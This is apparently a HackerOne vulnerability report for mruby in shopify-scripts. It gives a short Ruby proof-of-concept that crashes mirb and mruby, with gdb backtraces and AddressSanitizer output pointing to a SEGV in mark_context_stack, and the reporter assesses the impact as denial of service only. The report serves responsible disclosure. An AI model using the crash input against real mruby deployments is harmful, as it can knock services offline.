shopify-scripts: SIGABRT - method_missing - mark_context_stack

2017-02-10T15:45:39
ID H1:205284
Type hackerone
Reporter ston3
Modified 2017-03-29T23:32:37

Description

PoC

The following code triggers the bug (attached as test_method_missing.rb):

def method_missing(e,*)0.n||=0
00end
b

Debug - mirb

(gdb) r test_method_missing.rb 
Starting program: /home/x/Desktop/research/test/mruby/bin/mirb test_method_missing.rb
mirb - Embeddable Interactive Ruby Shell

 => :method_missing
*** Error in `/home/x/Desktop/research/test/mruby/bin/mirb': realloc(): invalid next size: 0x00000000006c0e20 ***

Program received signal SIGABRT, Aborted.
0x00007ffff7744f79 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56  ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) info reg
rax            0x0  0
rbx            0x72 114
rcx            0xffffffffffffffff   -1
rdx            0x6  6
rsi            0x6268   25192
rdi            0x6268   25192
rbp            0x7fffffffc2a0   0x7fffffffc2a0
rsp            0x7fffffffbf08   0x7fffffffbf08
r8             0x3032653063363030   3472949521153404976
r9             0x742f686372616573   8372025008635078003
r10            0x8  8
r11            0x246    582
r12            0x7fffffffc0b0   140737488339120
r13            0x7  7
r14            0x72 114
r15            0x7  7
rip            0x7ffff7744f79   0x7ffff7744f79 <__GI_raise+57>
eflags         0x246    [ PF ZF IF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0

Backtrace - mirb

(gdb) bt
#0  0x00007ffff7744f79 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7748388 in __GI_abort () at abort.c:89
#2  0x00007ffff77821d4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff7890a10 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff778cf37 in malloc_printerr (action=<optimized out>, str=0x7ffff788cc07 "realloc(): invalid next size", ptr=<optimized out>) at malloc.c:4996
#4  0x00007ffff7790777 in _int_realloc (av=<optimized out>, oldp=0x6c0e10, oldsize=<optimized out>, nb=<optimized out>) at malloc.c:4234
#5  0x00007ffff7791e09 in __GI___libc_realloc (oldmem=0x6c0e20, bytes=4096) at malloc.c:3029
#6  0x0000000000429719 in mrb_default_allocf (mrb=0x6ae010, p=0x6c0e20, size=4096, ud=0x0) at /home/x/Desktop/research/test/mruby/src/state.c:60
#7  0x0000000000431998 in mrb_realloc_simple (mrb=0x6ae010, p=0x6c0e20, len=4096) at /home/x/Desktop/research/test/mruby/src/gc.c:201
#8  0x0000000000431a1a in mrb_realloc (mrb=0x6ae010, p=0x6c0e20, len=4096) at /home/x/Desktop/research/test/mruby/src/gc.c:215
#9  0x00000000004063cf in stack_extend_alloc (mrb=0x6ae010, room=6, keep=3) at /home/x/Desktop/research/test/mruby/src/vm.c:156
#10 0x00000000004064d5 in stack_extend (mrb=0x6ae010, room=6, keep=3) at /home/x/Desktop/research/test/mruby/src/vm.c:173
#11 0x000000000040a0ce in mrb_vm_exec (mrb=0x6ae010, proc=0x6b1150, pc=0x71c2fc) at /home/x/Desktop/research/test/mruby/src/vm.c:1248
#12 0x00000000004082e6 in mrb_vm_run (mrb=0x6ae010, proc=0x6b10f0, self=..., stack_keep=1) at /home/x/Desktop/research/test/mruby/src/vm.c:801
#13 0x0000000000402b90 in main (argc=2, argv=0x7fffffffe058) at /home/x/Desktop/research/test/mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:549

Clang - mirb

x@x:~/Desktop/research/test/mruby/bin$ ASAN_SYMBOLIZER_PATH=//usr/lib/llvm-3.8/bin/llvm-symbolizer ../../clang/mruby/bin/mirb test_method_missing.rb 
mirb - Embeddable Interactive Ruby Shell

 => :method_missing
ASAN:DEADLYSIGNAL
=================================================================
==843==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052ecad bp 0x7fff76be8fa0 sp 0x7fff76be8f50 T0)
    #0 0x52ecac in mark_context_stack /home/x/Desktop/research/test/clang/mruby/src/gc.c:554:11
    #1 0x52eac3 in mark_context /home/x/Desktop/research/test/clang/mruby/src/gc.c:571:3
    #2 0x52e572 in root_scan_phase /home/x/Desktop/research/test/clang/mruby/src/gc.c:867:3
    #3 0x52e20f in incremental_gc /home/x/Desktop/research/test/clang/mruby/src/gc.c:1074:5
    #4 0x52d66d in incremental_gc_step /home/x/Desktop/research/test/clang/mruby/src/gc.c:1115:15
    #5 0x52d2e0 in mrb_incremental_gc /home/x/Desktop/research/test/clang/mruby/src/gc.c:1159:5
    #6 0x52d158 in mrb_obj_alloc /home/x/Desktop/research/test/clang/mruby/src/gc.c:507:5
    #7 0x50db34 in ary_new_capa /home/x/Desktop/research/test/clang/mruby/src/array.c:30:23
    #8 0x50da97 in mrb_ary_new_capa /home/x/Desktop/research/test/clang/mruby/src/array.c:41:22
    #9 0x4fc908 in mrb_vm_exec /home/x/Desktop/research/test/clang/mruby/src/vm.c:1526:26
    #10 0x4f984e in mrb_vm_run /home/x/Desktop/research/test/clang/mruby/src/vm.c:801:10
    #11 0x4f3010 in main /home/x/Desktop/research/test/clang/mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:549:18
    #12 0x7f8f26c16ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #13 0x41a575 in _start (/home/x/Desktop/research/test/clang/mruby/bin/mirb+0x41a575)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/x/Desktop/research/test/clang/mruby/src/gc.c:554:11 in mark_context_stack
==843==ABORTING

Debug - mruby

(gdb) r test_method_missing.rb 
Starting program: /home/x/Desktop/research/test/mruby/bin/mruby test_method_missing.rb
*** Error in `/home/x/Desktop/research/test/mruby/bin/mruby': realloc(): invalid next size: 0x00000000006bfe20 ***

Program received signal SIGABRT, Aborted.
0x00007ffff7744f79 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56  ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) info reg
rax            0x0  0
rbx            0x73 115
rcx            0xffffffffffffffff   -1
rdx            0x6  6
rsi            0x2356   9046
rdi            0x2356   9046
rbp            0x7fffffffd3d0   0x7fffffffd3d0
rsp            0x7fffffffd038   0x7fffffffd038
r8             0x3032656662363030   3472949753064861744
r9             0x7365742f68637261   8315180033973121633
r10            0x8  8
r11            0x246    582
r12            0x7fffffffd1e0   140737488343520
r13            0x7  7
r14            0x73 115
r15            0x7  7
rip            0x7ffff7744f79   0x7ffff7744f79 <__GI_raise+57>
eflags         0x246    [ PF ZF IF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0

Backtrace - mruby

(gdb) bt
#0  0x00007ffff7744f79 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7748388 in __GI_abort () at abort.c:89
#2  0x00007ffff77821d4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff7890a10 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff778cf37 in malloc_printerr (action=<optimized out>, str=0x7ffff788cc07 "realloc(): invalid next size", ptr=<optimized out>) at malloc.c:4996
#4  0x00007ffff7790777 in _int_realloc (av=<optimized out>, oldp=0x6bfe10, oldsize=<optimized out>, nb=<optimized out>) at malloc.c:4234
#5  0x00007ffff7791e09 in __GI___libc_realloc (oldmem=0x6bfe20, bytes=4096) at malloc.c:3029
#6  0x0000000000426aa0 in mrb_default_allocf (mrb=0x6ad010, p=0x6bfe20, size=4096, ud=0x0) at /home/x/Desktop/research/test/mruby/src/state.c:60
#7  0x000000000042ed1f in mrb_realloc_simple (mrb=0x6ad010, p=0x6bfe20, len=4096) at /home/x/Desktop/research/test/mruby/src/gc.c:201
#8  0x000000000042eda1 in mrb_realloc (mrb=0x6ad010, p=0x6bfe20, len=4096) at /home/x/Desktop/research/test/mruby/src/gc.c:215
#9  0x00000000004062c6 in stack_extend_alloc (mrb=0x6ad010, room=6, keep=3) at /home/x/Desktop/research/test/mruby/src/vm.c:156
#10 0x00000000004063cc in stack_extend (mrb=0x6ad010, room=6, keep=3) at /home/x/Desktop/research/test/mruby/src/vm.c:173
#11 0x0000000000409fc5 in mrb_vm_exec (mrb=0x6ad010, proc=0x6b0120, pc=0x71b3dc) at /home/x/Desktop/research/test/mruby/src/vm.c:1248
#12 0x00000000004081dd in mrb_vm_run (mrb=0x6ad010, proc=0x6b0150, self=..., stack_keep=0) at /home/x/Desktop/research/test/mruby/src/vm.c:801
#13 0x000000000041034f in mrb_top_run (mrb=0x6ad010, proc=0x6b0150, self=..., stack_keep=0) at /home/x/Desktop/research/test/mruby/src/vm.c:2547
#14 0x0000000000442301 in mrb_load_exec (mrb=0x6ad010, p=0x709490, c=0x7080e0) at /home/x/Desktop/research/test/mruby/mrbgems/mruby-compiler/core/parse.y:5755
#15 0x0000000000442397 in mrb_load_file_cxt (mrb=0x6ad010, f=0x7090d0, c=0x7080e0) at /home/x/Desktop/research/test/mruby/mrbgems/mruby-compiler/core/parse.y:5764
#16 0x00000000004024f8 in main (argc=2, argv=0x7fffffffe058) at /home/x/Desktop/research/test/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:232

Clang - mruby

x@x:~/Desktop/research/test/mruby/bin$ ASAN_SYMBOLIZER_PATH=//usr/lib/llvm-3.8/bin/llvm-symbolizer ../../clang/mruby/bin/mruby test_method_missing.rb 
ASAN:DEADLYSIGNAL
=================================================================
==1064==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052b20d bp 0x7fff60b78140 sp 0x7fff60b780f0 T0)
    #0 0x52b20c in mark_context_stack /home/x/Desktop/research/test/clang/mruby/src/gc.c:554:11
    #1 0x52b023 in mark_context /home/x/Desktop/research/test/clang/mruby/src/gc.c:571:3
    #2 0x52aad2 in root_scan_phase /home/x/Desktop/research/test/clang/mruby/src/gc.c:867:3
    #3 0x52a76f in incremental_gc /home/x/Desktop/research/test/clang/mruby/src/gc.c:1074:5
    #4 0x529bcd in incremental_gc_step /home/x/Desktop/research/test/clang/mruby/src/gc.c:1115:15
    #5 0x529840 in mrb_incremental_gc /home/x/Desktop/research/test/clang/mruby/src/gc.c:1159:5
    #6 0x5296b8 in mrb_obj_alloc /home/x/Desktop/research/test/clang/mruby/src/gc.c:507:5
    #7 0x50d804 in ary_new_capa /home/x/Desktop/research/test/clang/mruby/src/array.c:30:23
    #8 0x50d767 in mrb_ary_new_capa /home/x/Desktop/research/test/clang/mruby/src/array.c:41:22
    #9 0x4fc518 in mrb_vm_exec /home/x/Desktop/research/test/clang/mruby/src/vm.c:1526:26
    #10 0x4f945e in mrb_vm_run /home/x/Desktop/research/test/clang/mruby/src/vm.c:801:10
    #11 0x501aa3 in mrb_top_run /home/x/Desktop/research/test/clang/mruby/src/vm.c:2533:12
    #12 0x536020 in mrb_load_exec /home/x/Desktop/research/test/clang/mruby/mrbgems/mruby-compiler/core/parse.y:5755:7
    #13 0x5361f2 in mrb_load_file_cxt /home/x/Desktop/research/test/clang/mruby/mrbgems/mruby-compiler/core/parse.y:5764:10
    #14 0x4f2bb5 in main /home/x/Desktop/research/test/clang/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:232:11
    #15 0x7f48614caec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #16 0x41a4e5 in _start (/home/x/Desktop/research/test/clang/mruby/bin/mruby+0x41a4e5)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/x/Desktop/research/test/clang/mruby/src/gc.c:554:11 in mark_context_stack
==1064==ABORTING

Impact

As far as I can see, it is not exploitable. But it can cause DoS.